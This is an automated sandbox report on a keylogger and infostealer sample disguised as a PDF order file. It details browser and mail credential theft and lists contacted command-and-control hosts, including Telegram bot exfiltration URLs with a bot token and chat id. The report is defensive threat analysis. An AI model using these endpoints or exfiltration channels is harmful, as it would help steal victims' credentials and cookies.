            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeRegistry value created: DisableCMD 1Jump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            Software Packing
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            21
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560036 Sample: Order requirements CIF Gree... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 api.telegram.org 2->25 27 4 other IPs or domains 2->27 41 Found malware configuration 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Yara detected GuLoader 2->45 51 6 other signatures 2->51 8 Order requirements CIF Greece_pdf.exe 1 29 2->8         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 23->47 49 Uses the Telegram API (likely for C&C communication) 25->49 process4 file5 21 C:\Users\user\AppData\...\Familieskabet.Sch, ASCII 8->21 dropped 53 Suspicious powershell command line found 8->53 12 powershell.exe 26 8->12         started        signatures6 process7 signatures8 55 Early bird code injection technique detected 12->55 57 Writes to foreign memory regions 12->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 12->59 61 2 other signatures 12->61 15 msiexec.exe 16 8 12->15         started        19 conhost.exe 12->19         started        process9 dnsIp10 29 checkip.dyndns.com 132.226.247.73, 49738, 49742, 49750 UTMEMUS United States 15->29 31 api.telegram.org 149.154.167.220, 443, 49806, 49824 TELEGRAMRU United Kingdom 15->31 33 3 other IPs or domains 15->33 35 Tries to steal Mail credentials (via file / registry access) 15->35 37 Tries to harvest and steal browser information (history, passwords, etc) 15->37 39 Disables CMD prompt 15->39 signatures11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Order requirements CIF Greece_pdf.exe58%ReversingLabsWin32.Spyware.Snakekeylogger
            Order requirements CIF Greece_pdf.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.micros60%Avira URL Cloudsafe
            http://crl.microl0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.78
            truefalse
              high
              drive.usercontent.google.com
              172.217.16.129
              truefalse
                high
                reallyfreegeoip.org
                188.114.96.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.75false
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/msiexec.exe, 00000006.00000002.2957521886.00000000212E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgmsiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botmsiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.microsoftpowershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.office.com/lBmsiexec.exe, 00000006.00000002.2957521886.00000000212F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.micros6powershell.exe, 00000001.00000002.2042349403.000000000794B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorOrder requirements CIF Greece_pdf.exefalse
                                                              high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20amsiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000006.00000002.2957521886.00000000212C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://varders.kozow.com:8081msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://aborters.duckdns.org:8081msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.commsiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://nsis.sf.net/NSIS_ErrorOrder requirements CIF Greece_pdf.exefalse
                                                                                high
                                                                                http://crl.microlpowershell.exe, 00000001.00000002.2042349403.0000000007890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.google.com/msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://anotherarmy.dns.army:8081msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/8.46.123.75$msiexec.exe, 00000006.00000002.2957521886.000000002117A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contoso.com/powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000006.00000002.2957521886.00000000212BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.orgmsiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://apis.google.commsiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://api.telegram.orgmsiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://drive.usercontent.google.com/1msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://drive.usercontent.google.com/smsiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  142.250.186.78
                                                                                                                  drive.google.comUnited States
                                                                                                                  15169GOOGLEUSfalse
                                                                                                                  149.154.167.220
                                                                                                                  api.telegram.orgUnited Kingdom
                                                                                                                  62041TELEGRAMRUfalse
                                                                                                                  172.217.16.129
                                                                                                                  drive.usercontent.google.comUnited States
                                                                                                                  15169GOOGLEUSfalse
                                                                                                                  188.114.96.3
                                                                                                                  reallyfreegeoip.orgEuropean Union
                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                  132.226.247.73
                                                                                                                  checkip.dyndns.comUnited States
                                                                                                                  16989UTMEMUSfalse
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1560036
                                                                                                                  Start date and time:2024-11-21 10:35:10 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 7m 10s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:8
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:Order requirements CIF Greece_pdf.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@6/13@5/5
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 97%
                                                                                                                  • Number of executed functions: 152
                                                                                                                  • Number of non-executed functions: 96
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7512 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: Order requirements CIF Greece_pdf.exe
                                                                                                                  TimeTypeDescription
                                                                                                                  04:36:04API Interceptor44x Sleep call for process: powershell.exe modified
                                                                                                                  04:36:58API Interceptor46086x Sleep call for process: msiexec.exe modified
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  149.154.167.220ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                        PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      188.114.96.3CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.mffnow.info/1a34/
                                                                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.mydreamdeal.click/1ag2/
                                                                                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.questmatch.pro/ipd6/
                                                                                                                                      QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.rtpwslot888gol.sbs/jmkz/
                                                                                                                                      QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                      • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                      QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • filetransfer.io/data-package/7pdXjNKP/download
                                                                                                                                      132.226.247.73z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • checkip.dyndns.org/
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      reallyfreegeoip.orgz1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.21.67.152
                                                                                                                                      REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 104.21.67.152
                                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.67.177.134
                                                                                                                                      Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                      • 172.67.177.134
                                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      new order #738833.exeGet hashmaliciousGuLoaderBrowse
